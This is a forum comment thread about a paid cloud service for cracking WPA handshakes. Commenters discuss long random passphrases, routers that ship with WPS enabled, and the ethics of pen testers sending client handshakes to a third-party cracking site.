Any simple password generator (say, Apple's Keychain, or pwgen) should be able to generate a non-dictionary key of length 12-16 characters in a few seconds that would withstand this and most similar techniques for the next few years.
A depressingly large number of recently manufactured routers do, and it is on by default by mandate of the WiFi alliance. If the router is Cisco/Linksys, in many instances you can't disable it, at least as I understand it.
From a Reuters article about a similar program by German security researcher Thomas Roth [1]:
"Nothing in this researcher's work is predicated on the use of Amazon EC2. As researchers often do, he used EC2 as a tool to show how the security of some network configurations can be improved," said Amazon spokesman Drew Herdener.
It's times like these I'm glad my WPA password is 63 characters long. It's easy for me to remember though as it's a long sentence. Bit of a pain when setting stuff like Apple TV up though :/
Why not? A WPA handshake can be considered public information. Connecting to that particular ESSID yields all that's needed to brute force WPA and would be considered external. There's no limitations this presents to pen testers. However, for $17 this is a relatively small dictionary set. Based on what we use for real world pen testing we have just shy of 1 billion unique words / phrases.
Technically it's public but you need to be responsible with how you deal with your client's data. Even if the NDA says nothing about releasing handshake details, you still have to explain to your client why a WPA-cracking website has details about their infrastructure.
I agree the convenience is attractive but I wouldn't want to put myself in that position.
Interesting thought, but the reality of the situation is quite different. If something is in the public domain (i.e. something you can see, hear or smell) what provisions within the realm of the law protect you from using that sensory data? A company's parking lot may have provisions for me not entering it (i.e guard, fence, etc), but if I perch myself on a parking ramp across the street and use a camera with a powerful lens I can still take pictures of cars and people within the lot.
The same is true for radio, and conversely 802.11. If you expose yourself to data leakage via loud APs / incorrect antenna then it should be well understood that that information is being placed in the public domain (i.e. WPA handshake). A would be malicious user is not bound by any of the restrictions mentioned, and so placing them on people that are knowingly auditing is highly counterproductive unless all the client is going for is a warm fuzzy. This particular way of thinking about pen testing and assessments needs to be at the forefront of the testing itself, because if the client is that misinformed/misled they probably need more help than an incorrectly scoped assessment.
That depends entirely on the terms of the engagement. If this service (or others) had agreeable data retention/use terms, then the pentester and the client could include that as an acceptable use of their data.
Any simple password generator (say, Apple's Keychain, or pwgen) should be able to generate a non-dictionary key of length 12-16 characters in a few seconds that would withstand this and most similar techniques for the next few years.